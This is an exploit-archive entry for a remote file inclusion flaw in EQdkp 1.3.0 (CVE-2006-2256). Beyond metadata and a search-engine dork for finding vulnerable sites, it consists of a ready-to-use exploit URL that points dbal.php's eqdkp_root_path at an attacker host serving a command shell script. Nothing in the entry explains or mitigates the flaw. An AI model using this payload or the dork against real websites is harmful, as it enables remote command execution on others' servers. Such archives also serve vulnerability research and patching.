EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

Author: OLiBekaS
type: webapps
platform: php
port: 
date_added: 2006-05-06  
date_updated: 2016-11-29  
verified: 1  
codes: OSVDB-25339;CVE-2006-2256  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comeqdkp-1.3.0.zip  

raw file: 1764.txt  

Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]